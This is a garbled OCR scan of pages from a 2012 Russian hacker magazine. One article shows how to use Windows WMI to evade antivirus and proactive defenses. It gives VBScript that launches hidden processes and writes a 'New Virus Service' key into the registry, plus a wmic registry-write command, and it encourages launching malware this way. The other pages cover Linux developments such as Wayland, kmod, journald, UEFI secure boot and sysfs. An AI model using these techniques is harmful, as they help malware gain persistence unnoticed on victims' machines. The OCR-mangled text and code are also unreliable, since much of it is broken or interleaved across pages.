
Н а nрактике n аттер н <<Шаблонный метод >> имеет множество

вариаций. Многие из программистов сами того не зная р еализо ­ вывали это т nаттерн в т ом или ином виде. Н о осно вн ой принциn остается неизменным: <<Шаблонный мето д >> определяет <<ске ­

>tected :

11

перехватчик

лет >> алго ри тма в методе , оставляя оnределение реализации

virtual bool stop Hook() {ret ur n f alse;};

н екоторых ш агов субклассам. С убклассы же, в с в ою очередь,

11 ..

м огут переоnределять некоторые части алгоритма без измене­ ния его структуры. ::Х::

От метода stopHook[] зависи т, будет ли цикл работать дальше или

www.epidemz.net

_

,,


КОДИНГ

Ал екса ндр Экке рт (stannic.manlagmail.coml

8

8

о ход защит НЕОЖИДАННЫЙ ВЗГЛЯД НА ПРИВЫЧНЫЕ В Е ЩИ Как это часто бывает, самое интересное и увлекательное просто валяется

под ногами . Сегодня мы рассмотрим помощи средств, входящи х в стандартную

Windows .

оговорим о Windows Management lnstгume n tation [W MI ),

но с несколько неnривычной точки зрения. Собственно,][

уже nисал на эту тему- как можно nриспоеобить сре д ства

WMI для своих нужд [ xakep.гu/magaz~ne/xa/118/030/1 . asp l. Б удем

во з можность обхода проактивны х з ащит при компл е ктацию ОС

n

считать эту статью nродолжением написанного ранее.

ЛОМАЯ БРОНЬ ПРОАКТИВНЫХ ЗАЩИТ Насколько я знаю, скрипты WM I исnользует в своей работе лишь один человек из десяти. И это в лучшем случае. А ведь зря l Это удобное и мощное средство.

Ну и что ту т такого

интересного,- скаже шь ты,- По большей час т и W MI пред­ назначен для сбора информации о компьютере и выполне н ия нехитрых приемов админис т рирования. Я бы с тобой согла­ сился, если бы не два <<НО>>, которые наглядно демонс т рируют, как можно использовать всю мощь

WMI для создан и я кумуля­

тивных зарядов, пробивающих бронь антивирусов и проактив­ ных защит.

П ервое- это возможность созда ния нужного тебе процесса. Каким образом?

Const SW_NORМAL 1 Const SW_HIDE = 0 strComp uter = ", " strCommand = "notepad.exe" Set ob j WMI Service = GetObject ( "winmgmts:"

& "{impersonationlevel=impersoпate}! \\ " & strComputer & "\ root \ cimv2" ) Set objStartup = objWMIService.Get( "Win32_ProcessStartup " ) Set objConng = objStartup.Spawnin sta nce_ objConng.ShowWindow = SW_NORМA L

Н е видимый

Notepad

Set obj Process = objWMIService.Get( "Win32_Process " ) intRetur n = objProcess . Create _ (st r Command, Nul l, objConfig, intP r ocessiD )

ХАКЕР

100

www.epidemz.net

04/159/ 2012


WMI: обход за щит

1":"~· :I WII"ФФ

D: ,Doc u l'le n t!> and Setti n g:;'R'н~t~c)tlnic C.R 11 Ct•eateJ<ey )IDefKey= "&H80blOfi002"

Cur1•e n t U e J'S io n ''-f 11 с k_a u e Вы n о11 н е нм е

1 r:l

11 ict•o:.oft \.Ji n ~o11:> ХР [ Верс и я S . 1 . 2ЫJB J (С) Кор п ора ци я " '"·i t<pocooт. 19 8 5-2001. / N м'leSpace:,·ч·oot\,dcfcн,lt

Cla:;::; StdRegPl"ou sSнbKe yN<•ne " "SOFТ\IARE ' ' t1 ic l"osof t' \. llindo11::o''

t•::; ''

<Std RcgPt•o u )- >C t•cdtcl<c

все, что можно сделать, используя WMIC. WMIC могут быть также

_PA R A rt EТERS

{ Re tнJ• nU rt l Lie

>;

=

ставляют основной круг задач администраторов и информацию, в которой они могут быть заинтересованы. Однако это еще не

у()

!k n еuн ыЙ B ЬI JOB tiCfO D d . Пар<нt сr ры Pыt~ond :

in::;t,\n ce o f

псевдонимов может быть выведен с помощью набора команды

«WM IC /?>>. Им еющиеся в нашем распоряжении nсевдонимы nред­

исnользованы для nрямы х за прос ов к WMI-cxeмe. Это даст тебе

0;

достуn ко всем имеющимся классам, а не только к тем, которые

nредоставляются с nомощью nсевдонимов. Н аnример, чтобы

3апуск програнны

создать nроцесс, достаточно в ып олнить в открывшейся командной ВвеАIНе 1111я nporpot1НЫ, n.on101, дсжунент~

ресурс.!! Интерttетll, н

--

Windows откроет

111111

строке pгocess call create "calc.exe". Из известных аверов на такое

нх.

Открыть: 1jNмiC /Ni!IГГie59oce:\\root.\defd Смs StdReQPr

создание nроцессаникто даже ухом не nовел. А что, если таким об­

::::J

разом заnустить на исnолнение вирус? Н у и nоследний булыжник в огород красивых «решений по

100 % безопасности

вашего ком­

nьютера>>, - смотрим, как легко <<брюки nре вр ащаются в шорты>> :

Беспалевная запись в ре естр

wmic / NameSpace:\ \root\default Class StdRegProv Call CreateKey hDefKey= " &H80000002" sSubKey Nam e= " SOFТWAR E\\Micro ­ soft \\Windows \\CurrentVersion \ \fuck_avers "

Обрати внимание на параметр ShowWindow: ес ли хочешь скрыть окно твоего приложения, то используй параметр SW_

HIDE =О. Н а скрине ты можешь видеть, как в списке проце ссов

Заnусти этот код на выnолнен ие, посмотри на результат, а потом

taskmanageг'a болтается заnущенный таким образом «блокнот»,

- на «лучшее решение для защиты>>, которое обесnечивает так

однако на nа н ели задач ничего нетl Второе- э то заnись в реестрl

на зы ваемую «безоnасность>> т воего компьютера, n оплачь и иди

Да-да, исnользуя vЬs-скрипты, можно легко nисать в реестр !

выкидывать е г о на nомойку. Если заnуск vЬ-скриnтов аверами

худо-бедно палится [ хотя и далеко не всеми], то в данном случае ни о дин из десяти протестированных мной антивирусов [а тестировал

const HKEY_LOCAL_MAC HINE = &Н80000002 strComp ut er = "." Set ob jR eg=GetObj ect( _ "winmgmts:{impersona t ionleve l =impersonate}! \\ " & strComput er & " \ root \ default:StdRegProv" )

я только самые nопулярные] не смог отловить такую хитропоnую заnись в чувствительные ветки реестра. П о-моему, уже не смешно.

ЗАК ЛЮЧЕНИЕ Ит ак, nодведем итоги. Заметь, я не рассматриваю в данной статье

strKeyPath = "SYSTEM\\CurrentControlSet \ \Services \\MyService" objReg . CreateKey HKEY_ LOCAL_MACHINE, str KeyPath strVa lueName = "Descrition" strVa lu e = " New Virus Service " objReg.SetStringValue _ HKEY_ LOCAL_MAC HINE ,strKeyPath,strValueName,strValue

каки е-то уязвимости оnерационной систе мы, по зволяю щие вы­

nолнить зловредный код на целевой машине, которые являются недоглядом разработчиков Windows,- их и так хватает. Сегодня мы уви дели, что можно запросто, исnользуя только законные сре д­

ства оnерацион ной с ист емы, выбираться из тех клеток, которые ставят «честным хакерам>> разработчики антивирусов и nроактив­ ных за щит.

:::r:

В данном случае ветка рее стра HKEY_LOCAL_ MACHINE \

SYSTEM\CuггentContгoiSet\Seгvices\ исnользуется для старта системных служб и сервисов Window s, в том числе загрузки драй­ веров. П равда, тут есть одно ограничение, о котором ты, думаю, слышал . Д анный метод nройдет для Windows ХР, но не для <<се­

мерки>>, - в Win7 писать в ветку HKEY_LOCAL_MACHIN E не дадут.

DYNAMICWRAPPERX

Однако есть возможность использования аналогичного скрипта для заnиси в HKEY_C URRENT_ USER . Отмечу сразу, что указанные сnособы nробивают не все, но большинство антивирусов. К nриме ­

В контексте данной ста тьи не могу не упомянуть о чуде nод

н азва н и ем Dyna micWгappeгX [scгipt-cod ing . com/dynwгa px .html ].

ру, описа нны е ниже т ехники тестиравались мной около года назад,

Он а не имеет nрямого отношения к

и из десяти антивирусов со стандартными настройками безоnас­

т ебе нужно о ней знать . Зто АсtivеХ-комnонент [СОМ-сервер!,

ности лишь одИн заблокировал создание процесса и заnись в чув­

который предоставляет возможность вызывать из яваскриnтов

ствите льные ветки реестра [в частности, HKEY_ LOCAL_MACH INE\

и VВ -с криnтов функции, эксnортируемые dll-библиотеками,­

50 FТWAR Е \ М icгosoft\Wi ndows\C uггentVeгs io n\Ru n], за ложенные

в частности, функции

в vЬs - скриnте. Все остальные- как бы сказать nомягче- nро­

WMI, но мне кажется, что

Windows API .

Вызвать напрямую , скажем , функцию CгeateWindowEx из

vb-

нельзя , интерфейс nод это не заточен. И вот автор Dynami c WгappeгX

шляnили выполнение nотенциально оnасного кода.

-замечательный nрограммист Юрий Попов- оза дачился этой

ТЕ ЖЕ ЯЙЦА, ВИД СБОКУ

nроблемой и ус nешн о ее решил.

Дл я исnолнения трюковнеобязательно исnользовать VB- и Jаvа­

С помощью nроцедуры регистрации СОМ - серверов в системе:

скриnты. Существует вnолне адекватная командная строка,

"гegsvг32.ex e dynwгap x .dll" , устанавливаем DynamicWгappeгX

которая nустит нас в оболочку WMI IWMI command-line]. Для это го

в систе му и nолучаем крайне очаровательную возможность

нужно выполнить команду <<wm ic >>. Суть командной строки WМI­

вызывать WiпАРI-фун к ции из VВ/Jаvа-скриптов!

выполнение того же скриnта, как если бы он был оформлен в виде

Дела е тся это nримерно так :

VBS- или JS -кода. Командная строка WMI включает серию «nредваритель но за­ готовленных>> WMI-зanpocoв, изв естных как nсевдонимы. Ты смо­ жешь nросмотреть содержание любого псевдонима, просто набрав

Set DX = Crea t eObj ect( "DynamicWrapperX" ) OX.Reg i st er "kernel32" , "Веер" , "i=uu" ОХ.Веер 800 , 1000

в командной строке «WM IC>>, а следом- имя этого nсевдонима. Например <<W MIC QFE >> выведет список всех <<запла ток >> и nа кетов

Как можно ее nрименить- решать тебе , но согласись, что довольно

обновлений, установленных на комnьютере. П олный список всех

удобная штука!

ХАКЕР

04/159/2012

101

www.epidemz.net


UNIXOID

Юрий << Adept» Видинеев ladeptglagmail.coml

HOBble

1

i'

требуют перемен Мир OpenSouгce привлекает своей динамикой. В нем постоянно что-то происходит: системы, концепции, стандарты

~ ' '

сменяют друг друга

) J.

r, \ 1

с бешеной скоростью, причем с каждым годом

l

~

темп только увеличивается .

Об основных актуальных

. , 'fj

направлениях развития

...

~

свободных решений мы сегодня и поговорим .

'

-- · ~( ( '. ..

-----~;/

ОПИСАНИЕТЕХНОЛОГИЙ БЛИЖАЙШЕГО БУДУЩЕГО, ИДУЩИХ НА СМЕНУ ТЕХНОЛОГИЯМ ДНЯ ВЧЕРАШНЕГО

..• 1

....

"'·L"

..

·' о

'

,_..

~~·:.··~

1~ Однооконный режим в

,2: "

www.epidemz.net

Gimp 2.8

ХАКЕР

102

с

04/159/2012


Новы е времена требуют перемен

~

- : bash

Edit

File

Vi ew

Bookmarks

Settings

v

[user@myarch -]$ 1s -1 /bin/1smod 1 rwx rwx rwx 1 root root 13 Jan 17 01:06 [user@myarch -]$ 1smod 1 head -3 Modu1e Size Used Ьу vboxvid~o

1869 188362

drm [user@myarch -]$ kmod 1ist 1 Size Modu1e 1869 vboxvideo 188362 d rm [user@myarch -]$ 1 ' lill просто ссылка на

Х : REVOLUTION Wayla nd- э т о п рот око л

/usr/bin/kmod

->

1 2 vboxvideo head -3

Used

Ьу

1 2 vboxvideo 1" lv

-: bash

lsmod -те перь

х

h

Help

1

kmod

и е г о д е м о н с тр а ци о н­

на я р еа ли з ация [на С , о бъем кода с ос т а вля е т

ме н ее 10 000 с трок, лицензия- MITI, ид у щи й

клиент [ о в е р хе д при это м обещает бы ть н е

Jouг n al , к о т ор ый появил ся в рели з е

очень бо льшим) .

38.

Н е то ч т об ы

Wayland с ов с ем новый пр оек т 200 8 года ), но в е лик а

анал о гичную

[ р аз р аб от к а ведется с

sys temd

М о д уль п ре д оста вля ет ф у нкциональн ос т ь,

syslog,

но с н е к о торыми особ е н ­

ностями . Для нач а ла ра з ра б отчики отмечают

на сме н у ни мн о го ни мал о Х - с ервер у l О сно в­

в ероя т нос ть, что чере з п а р у -т р ойку л е т он о ка­

у с т а ричка

на я п ричина- Х ус тар е л: ег о архит екту р а на

жется во в сех д ес ктопны х и мобильных лин ук ­

ти л е т, целый с пи сок н е д ос т а тков.

се г о дн я шни й д е нь неакт у альна , а код с л ож н о

сах . Бла г о , п е рвы й стаб иль ный релиз

по дд е рживать .

за горами -во з можн о да же, чт о он ув идит с в е т

какая -либо ау т е нти ф и ка ц и я о тправит е ля :

до моме н т а в ых о да д а нног о н оме р а в п е ч а ть .

ес л и процес с пр е дст а вится , чт о он

Гла вная особ енн ос ть

не ни е в о дин эл е м е нт и ли

Wa yl and- об ъ е ди­ [Wayland Compositoг

Wa yland S e гveгl т о го , что в архитектур е Х

1.0 уже

KMOD : EVOLUTION

и мен е джером о к о н .

р аз р або тчиков и з

Composi to г им е ет

Weston,

10000, то так и

о к о л о тридца­

sy slog

о т су тств у ет

mysql

на

буд е т записано .

О тсутствуету твержд е нный формат, в кото­

В конце n рошлого г о да не с кол ько из ве с тны х

Wayland

П ри приеме сооб щ ени й в

п о р ту

б ыл~соб с тве нно ,Х- с ервером, композитором по к а един с твенн у ю реали з ацию-

не

syslog, кото р о м у у ж е

RedHa t н аписали

отк рыт о е

р ом логирую т с я данны е. Это сильно затр уд­ н яет парси н г лог ов и вынуждает и з м е нять

п и с ь мо, в ко тор о м п е р е чи с л или возмож но ст и,

скрипты па р с инг а п ри любых изменения х в ыво да в лог в программах.

ко т о р у ю с оздают ра з раб о тчики прото ко ла

к о т орые о ни х отели б ы р еа лиз овать в ядре

Wayland. В н едалеком будущем ожидает с я nод­ де ржка Wayland у Comp iz и Kwin. При этом все

Li nux и

б ыл о на э то время: goo.g[/RWgbl. Пр о шл о не­

о п е р а ции по рендеринг у окна будет выполнять

с к о л ь к о м есяцев , и одна из «хотело к>> у вид е ла

S у s lо g-лиш ь одна и з многих систем жур­

Wa yl and Cl ient [то е сть с амо прилож е ние ). Это

с в ет под и м енем

налир о вания , р аб отающих в

ни з коуровневых утилит ах, ес ли бы у них

В запис ях отс у тству е т информация о часо­ вом по я с е .

из о бражений, возникающих в Х Sегvег, а также

kmod. Пр е дс т а в ляе т с о б о й заме ну module-init-tools [па кета . со д е ржаще го у тилиты для управления модул я ми ядра : lsmod,

л а ги в с евозможных приложений. Когда лаги

у меньшить время отрисовки изменений. Еще

modpгobe, гmmod и другие) , основное преиму­

так раскиданы по системе, сложно искать

одним nлюсом является возможность работы от

щества- использование библиотеки

связи междусобытиями в них.

имени непривилегированного пользователя.

которая также мож е т и с пользовать с я в любых

Так как в лага х отсутствует какая-либо

прил о жениях [лицензия-

индексация, и х чтение очень незффективно

п о зволит избавиться от ошибок ренд е ринга

Так как

Wayland

завязан на такие штуки,

libkmod,

LGPLv2 и старше). приложение- udev. Раньше

Linux: есть еще

utmp /w tmp / Ыmp , lastlog , лаги ядра, а также

[при поиске приходит с я перебирать все

как Diгect Rendeгing IDRII, KMS IKeгnel Mode Settingl и GEM [Gгaphics Execution Manageгl , то бегать он может только поверх Linux и пока

при загр у зке несколько с отен раз вызывалась

внешняя утилита modpгobe [и nри этом не всег­

Сетевой протокол

только со свободными драйверами для видео­

да успешно- могло оказаться, что модуль уже

ции,нооченьограничен:вчастности,никак

карт

загружен) , а использование

не гарантируетдоставку

lntel, Radeon

и

Nouveau.

Одной из часто критикуемых вещей в но­

Первое подобное

libkmod помогло

существенно снизить накладные расходы на

строчки).

syslog

пр ост в реализа­

И з логов легко удаля т ь данные, чем часто

чтение файла конфигурации и построение

пользуются при взломе для заметания сле­

подсистемы [наподобие той, что с незапамят­

списка доступных мод улей при каждом вызове.

дов.

ных времен была в Х111 . Эта критика не совсем

Уменьшение времени загрузки nри переходе

Ограниченные средства контроля достуnа:

оправдана- просто сам протокол

на новый

пользователь или имеет доступ ко всем за­

сетевой подсистемы, но зто не мешает реа­

udev заметно даже на глаз. Кроме udev, с kmod возможно скоро научится работать systemd. Агсh Linux, как обычно, впереди пла­

лизовать сетевое взаимодействие на уровне

неты всей и с января этого года уже использует

можность сохранения метаданных записи.

композитора.

kmod версии 4. В экспериментальном репозито­ рии Debian также присутствует kmod версии 3.

учитывает оставшееся на разделе место и не

вом протоколе является отсутствие сетевой

Wayland

не включает в себя описания реализации

Поддержка[nравда , покавесьма о г рани­

ченная! Wayland уже есть во многих проектах: Qt, GTK, EFL IEnlightenment Foundation Libгaгyl, Clutteг, SDL. Приложения, не использующие

писям в логе, или не имеет их вообще.

Практически полностью отсутствует воз­ Ротация логов тоже не совершенна: она не

умеет динамически менять интервалы , что

SYSLOG: DESTRUCТION

позволяет проводить ОоS-атаки.

ни один из этих тулкитов [а таких не очень

Systemd- система инициализации [замена для SysVinit и Upstaгtl, которая используется

много),тоже поддерживаются- достаточно

во все большем количестве дистрибутивов. Но

Невозможность сохранения бинарных дан­

просто запустить Х.Огg-сервер как

речь пойдет не о ней, а о модуле под названием

ных типа coгedump.

ХАКЕР

Wayland-

Компрессия поддерживается только после ротации .

103

04 / 159/ 201 2

www.epidemz.net


UNIXOID Отсутствие возможности журналирования событий на этапе ранней загрузки или перед самым выключением ОС . Jouгnal также имеет особенности:

Все данные хранятся в формате «ключ­ значение». Ключи и значения могутбыть произвольные, значениями могутбытьдаже

бинарные данные .

1

liveuser@localhost:Файл

Правка

Вид

Поиск

Терминал

[liveuser@localhost -]$ getcap /bin/ping /bin/ping = сар net raw+ep [liveuser@localhost- -]$ 1 Б ольше ни к а к и х

С<

•1

Справка

i

SUID

Записипроиндексированы, ч тозначитель­ ноувеличиваетскоростьпоиска.

SU I D /SG ID -биты будут постепен н о за­

Заманчиво, конечно. Е сли бы не одно «НО>>

Компр ессия будет исnользова на и для лога,

-данные будут храниться в бинарном виде,

менены на capaЬilities - механизм ядра,

в который в данный,....юмент идет запись.

то есть никаких тебе tail, less и gгер напрямую.

с помощью которого можно гибкоуправлять

Для каждой записи будетсоздан ее хэш.

Перевесят ли все плюсы этот минус- покажет

привилегиями. Многие уязвимости недавне­

который образуется не только из самой

время.

го прошлого были связаны с использовани­ ем бинарников с SUID-битом.

записи, но и из хэш а предыдущей. Таким

образом можно будет по цепочке проверить

целостность всего л ога !например, на пред­ метудаления записей]. П одобный механизм уже давно успешно примен яется в git. Поддерживается API syslog 1с некоторыми расширениями] - не придется переписы­ вать приложения.

В озмож но сть гибко ограничить количество записей в лог за одну секунду. Это ограни­ чение может меняться

no заранее заданным

НОВЫЕ ВРЕМЕНА, НОВЫЕ СТАНДАРТЫ

chгoot, возможно, усту пит место более со ­ време н номуинструментудлязапускаподо­

Е сть еще пара интересных вещей , которые не

зрительного кода и изолированной работы

представляют из себя чего-то принципиально

приложений - libv iгt-sandbo x. Основанный

нового, а nросто изменяют годами устоя вшие­

на libviгt, при запуске он создает вирту­

ся моменты.

альную машину, в качестве корневой ФС

Каталоги /Ьin./sЬin./liЬ!/Iib64] будут совме ­ щены с соответствующими каталогами в/usг. П о крайней мере в Fedoгa la это значит, что

которой используется корень хает-сис темы , смонтированный в режиме гead-only. Дебют инструментадолжен произойти в Fedoгa 17.

впоследствии с большой долей вероятности

правилам в зависимости от количества

и в большинстве RРМ-д истрибутивов ]. Для

свободного места на раздел е.

обеспеченияобратнойсовместимости на

большинство перечисленных радикальных

В общем-то, ничего удивительного, что

Ротациябудетосуществлятьсяавтомати­

старом месте будут симлинки. Таким образом

перемен происходит в F edoгa - ее разработ­

чески,безприменениястороннихутили~

все неизменяемые части системы теnерь бу­

чики любят ломать устои: взять хотя бы н еда в­

П ри поиске активный и архивныелаги будут

дут лежать в одном месте, что позволит проще

н ее переименова н ие сетевух в зависимости

выглядеть как единое целое.

смонтировать их в гead-only, проще создавать

от их расположения на материнской плате.

Може т объединить в себе лог и в сех при­

виртуальные окружения и снаnшоты файло­

В Сапопiсаl же больше любят эксперименты

ложений, в том числе utmp/wtmp, журналы

вой системы . В качествеуспешного примера

с интерфейсами. Очередная инновация ­

загрузки и другие.

подобной иерархии приводятSоlагis 11.

Ubuпtu HUD IHead- Up Disp lay]: система меню,

НАВИСШАЯ УГРОЗА UEFI (Unified E x teпsiЫe Fiгmwaгe lпteгface)- грядущая замена уже порядком устаревшему BIOS, которая представля е т из себя скоре е

уж е не получится (прив е т пользователям Geпtoo),- точнее, получится ,

мини-ОС со своими драйверами, сетевым стеком, интерфейсом

но ядро надо будет подпи с ать с обственным ключом, а его открытую

с поддержкой мыши, локализации и многим другим . Плюсов от

часть как-то залить в х ранилищ е ключей

внедрения UEFI много, начиная с (как ни странно) возросшей скорости з агрузки и за к анчивая нэйтивной поддержкой нового формата

разбиения дисков GPT (не имеющего ограничений MBR) . Но и минусов у

UEFI

тоже предостаточно . Основной на сегодняшний день- зто баги.

Размер д е рева ис х одников

UEFI занимает около 35 Мб (для сравн е ния,

пр е ду с тан о вленной . Да и запустить самостоятельно собранное ядро

UEFI . Red Hat, Canonical Linu x Foundat ion отреагировали на это нововведение составлением с вои х р е ко м ендаций к к он е чной реализации , а FSF- петицией к производителям оборудования, в которой secure boot называется restricted boot (в случае некорректной реализации) . и

Кроме пробл е м, свя з анны х с ключами, есть еще nроблема

Liпu x без драйверов весит 30 Мб) , спецификация в текстовом виде

с загру з чи к ом,- са м ый поnулярный на сегодняшний день

-больше

распространяется по

2 200 страниц . И весь этот огромный объем кода еще не

GPLv3,

Grub2

в которой есть пункт против тивоизации ,

достаточно тщательно оттестирован- баги всплывают достаточно

тр е бующий nубликовать ключ в случае подписывания бинарника .

часто .

Предыдущая версия- Grub Legacy- в основном распространяется под GPLv2, но некоторые вспомогательныескрипты-под GPLv3 . Матплаты с UEFI и поддержкой secure boot могут появиться в продаже

Новаянеоднозначная фича версии

2.3 .1, -

UEFI, которая войдет в спецификацию

secure boot . Если не вдаваться в подробности, то

технологию можно описать следующим образом : весь код (точнее,

уже в этом году- возмо ж но , скоро придется учитывать этот асnект

его SHA-256 хэш) , работающий с железом напрямую (драйвера, ядро,

при выборе ж елеза . Пробл е ма становится еще более реальной , так

загрузчик) должен быть подписан одним из нескольки х специальных

как в соответствии с требованиями

ключей (RSA, 2048 бит), открытая часть которых хранится в прошивке

на системник/ноут заве т ную наклейку << CompatiЫe with Windows 8»,

матплаты . Неподписанный (или подписанный не тем ключом) код

производитель будет обязан включить опцию

исполняться не будет . Теоретически штука хорошая- эффективное

рекомендуется предусмотреть механизм для добавления собственных

средство против малвар и , выполняющейся до загрузки ОС (например,

ключей . А для систем на базе

живущей в MBR) . Но с другой стороны, в зависимости от реализации

кнопки отключения

может стать существенно сложнее или (что тоже не исключено) вовсе невозможно установить альтернативную ОС , отличную от

Microsoft для того, чтобы наклеить « Secure Boot ». К тому же

ARM- еще и обязательно отсутствие secure boot. Но это не повод для паники : многие производители (в числе первых- НР и Dell) сообщили, что обеспечат во всех своих новых nродуктах возможность отключить se cure boot .

ХАКЕР

101.

www.epidemz.net

04/159/2012


Новые времена требуют перемен

в которой чтобы выбрать определенный пункт, нужно написать его название в специальном

НЕ ВЗЛЕТЕЛИ

N810 и N900 начиная с 2005 года! и MoЫin ln tel [разрабатывался с 2007 года!. В 20 10 году Nokia и lntel объединили свои усилия для работы над новым ди стрибутивом- Meego,

от

Н овые тех н ологии приходят на сме ну старым

поле. Если результатов поиска н есколько,

по стоя нно, но не в се из них успешны и наход я т

то в ыбранный вариан т запоминается - т ак

свое место nод солнцем. И з прим е р ов по­

систе ма подстраивае тся под конкретного

с леднего времени мне особенно за помнились

ко то рый должен б ыл взять все лучш ее от

пользовате ля. В дальнейшем планирует с я

не ско лько.

Maemo

NftaЫes- замена iptaЫes/netfilteг. П люсы:

интеграция г олосо вого поиска . Не стоит пере­ живать, что классические м еню уберу т,

HUD

п ока н е замена им, а в се г о лишь приятное

более гибкий и расширяемый

ABI , отсут­

около тридцати кру nны х компаний ми р ового

ствие д ублирова н и я ко да [ i pta Ыes, агрtаЫеs

дополн е ни е. Описать такую шт уку непро-

и еЫаЫеs - по сути, копии о дн ого и того

сто, нужно попробовать самому. Благ о, это не

же ко да !, нет необходимости перезагрузки всех nравил пр и каждом изменении [из-за

сложно,в Ub uпtu

HUD должен 12.04.

быть интегрирован уже

уровня, управ л ение проектом перешло в руки

Linux Foun dation. П осле вып уска смартфона N9 Nokia потеряла и нте рес к Meego, сосре д о­ точившись на Windows Ph one . Чт обы дальше развивать проект, в конце прошлого года Linu x Foundation объединила свои нараб отки с LiM o [Linux MoЬilel Foundation под новым именем Tizen и основной концепцией приложений на HTML5. Разработчики Meego, в свою очередь, орга ни зовали фор к- Mer. Н е исключе на возможность слияния Tizen и Samsung Bada .

чего терялось вн утреннее состояние и все

Кроме крупных изменений, ко торые долго

у становленные соединения!. Концепция вы­ глядела мн огообещ ающе [подробнее можно посмотреть в][ #1 271, но, видимо, этого было

обкатываются , и о которых можно расска зать

недостаточно, чтобы перевесить популяр­

НОВОСТИ ОДНОЙ СТРОКОЙ

и MoЫin. П р оек т обещал быть пер ­

с пективным , заинтересованность выразили

много инт ересного, в ближ айш ее время нас

ность iptaЫes. В Fedoгa, кстати, для борьбы со

ждут и достаточно ощутим ые измене ния в ра з ­

сбросо м соединений при изменении правил

личных узких областях. Пр о нх также хоте л ось

с делали с пециаль ную прослойку- fiгewaii D ,

Возможно, нас опять ждет но вое имя для ОС,

бы упомянуть.

- которая сохраняет свое состояние. В Fedoгa

у которой уже было больше названий, чем

1Pv6. Давно не дик овинка.

Б олее того, благо­

даря заканчиваю щ емуся пулу 1Pv4 и регу­ лярно пр ово дим омуWогld

17

1Р v6уже

1Pv6 Day,

этот динамический файрвол, ск о рее всего,

работающих nод ее у n равлением устройст в на

будет использоваться по умолчанию.

рынке .

Второй пример подобногонеудачного

НАДЕЕМСЯ И ВЕРИМ

д оста т очно широко используется . Н овость

проекта - дистрибутив

заключается в реализации

и встраиваемых устройств от

Во всех этих нововведениях я ви жу только по ­

личны е патчи, реализующие эту функцио­

На чина ла сь эта ОС с двух

ложительные моменты. Н адеюсь, они nрой д у т

нальн ость, конечно, существуют д остаточно

от

1Pv6

N АТ. Р аз­

давно, но ско ро мы увидим з т о в netfilteг из

Linux

для мобильных

Linux Foundation. проект о в: Maemo

Nokia [с ней поста влялись прародите ли современных пл аншетов Nokia 770, NBOO,

исnыта ние временем и не останутся на сва лке

ист ории. :Х:

коробки.

FIOPS [ Faiг lnput/Output Opeгat ions Р е г Secondl- новы й планировщик ввода/вы во­ д а, предна з н а ченный для работы с SSD. П о

Way land

Х C l ieпt

C l ie п t

принцип у д ейс твия он похож на популярный

сейчас CFQ [и заимствует у него часть кода!, но уч итыва еттак ие свойства

Waylaпd Clieпt

SSD, как вы­

сокие скорости чтения и записи, неб ольшие

Х Client

ф Ф ХТ)

за д е р жк и , различную «с тоим ост ь » чтения

запроса от е го ра зме ра. Н аибольший отрыв

oтCFQ н овый планировщик nоказывает

Wayland Compositor

в те с та х со сме шанным гead /w гite профиле м.

@\

Код еще не протестирован, п оэтому, думаю,

раньше, чем в

Linux 3.5

мы его врядли уви­

ф

KMS

дим.

ext4-snapshots- реализация снапшотов для ext4 [по аналогии с теми, что есть в Ыгfsl. У снапшотов на уровне ФС довольно много плюсов nеред снапшотами на базе

LVM : нет

р е али з ующая не во з мо ж ность з ап уск а на

у стройств е м одифи ц иров анн о й в е р с ии nрошив к и .

..

и зап иси, зависимос ть скорости выполнения

• Тивоизация - nроц е дур а ,

~.

Xserver ~ Compositor

По н ят ие пошло от медиаллеера TiVo.

• utmp/wtmp/ Ыmр-фа й лы

в бинарном форм а те,

®

evd ev

ф

KMS

Kerne l

evdev

Kernel

в к оторы х х ранится

информация о текущи х

nользователя х в с истем е, лог

всех в ходов/ вы х одов и з с и стемы

Ар х ит е кт у ра

Wayland в

с равнении с ар х ит ект урой Х

Serve r

ин еуда ч ны х поn ы то к

необходимостизаранеерезервировать

ав т ори з ации .

место под снапшот, даже nри большом

Подробно мо ж но

количестве снапшотов производительность

о

не сильно падает. Правда, не факт, что эти

nрочитать в ][

systemd

148.

патчипопадут в ванильное ядро- патчи

со снапшотами для

ext3 [N EXT31 оттай же

команды пока туда так и не вошли.

В

Gimp 2.8, релиз

• До статочно FAQ по wayland :

ко т орогодолжен состоять­

nодробный

ся в первой половине этого года, наконец-то появится долгожданный однооконный

• Планы

интерфейс.

по

р аз р аб о тке Х12:

В скором времени большое количество ОреnSоuгсе-шутеров сможет перейти на ис­ пользование движка

id Tech 4, на базе кото­ Doom 3. Д вижок был недавно открыт компанией Zenimax [спасибо Джану рого построен

Кармакузазамечательнуютрадициюiпод

GPLv3 [с небольшими nоправками ! .

ХАКЕР

Демонстрация работы

Wayland . Пока в X.Org

04/ 159/2 012

105

www.epidemz.net


UNIXOID

Евгений Зобнин

РАЗБИРАЕМСЯ С KOBJECTS, SYSFS,

UDEV, UDISKS И UPOWER

[zobn inlagmail.co ml

l:lфiШIЩ!i Строго говоря,

sysfs-

это только один из кирпичиков системы

умного управления оборудованием, появившейся в L iпux в по­ следние годы. Сама по себе эта файловая система практически

беспол е зна и может дать желаемый результат только в сочетании с другими системами, построенными на ее основе, таки м и как

udev

[динамически создаю щ ей файлы устройств в катало г е /devl, udisks [автоматически монтирующей файловые системы вновь подк л ю­ ченн ых накопителей] и upoweг (системы управ л ения питанием , реагир у ющей на сообщения подсистемы

ACP I и

по д с т раивающей

параметры системы, используя sysfsl. Н о начнем с корневого элемента.

Одним из главных новшеств ядра

версии

2.6 стала

Linu x

поддержка виртуальной

файловой системы

sysfs,

экспортирующей

информацию об установленном оборудовании и позволяющей управлять его настройкой . Сегодня возможности

sysfs

широко

И

SYSFS

превратилось в

2.6,

2.5, которое после стабилизации

была переработка и унификация модели драйве­

ров, которая к тому времени стала слишком громоздкой, запутанной и сложной для понимания. С этой целью была придумана абс т рак­ ция, названная

KObject-

простая структура данных, позво л яющая

однозначно идентифицировать и связывать между собой различные

используются во всех дистрибутивах для определения железа, автоматической

устройства, которые « видит>> операционная система. Фактически, теперь каждое устройство, начиная от системного таймера и закан ­ чивая SСS I -приводом , было привязано к собственному уникальному

загрузки модулей и монтирования файловы х систем. Но что представляет собой данная

ФС , и какие плюсы она может дать обычным юзерам, знает далеко не каждый.

KOBJECTS

Одной из целей разработки ядра

К-объекту, который не только позволял точно иде н тифицировать его , но и связать с другими К-объектами по принципу <<родитель­ потомок >>. Например, usЬ-порт является <<родителем >> воткнуто-

го в него usЬ-устройства. Также были придуманы специальные

объединения К-объектов [ksetl для представления различных под­ систем, но в контексте данной статьи это роли не играет.

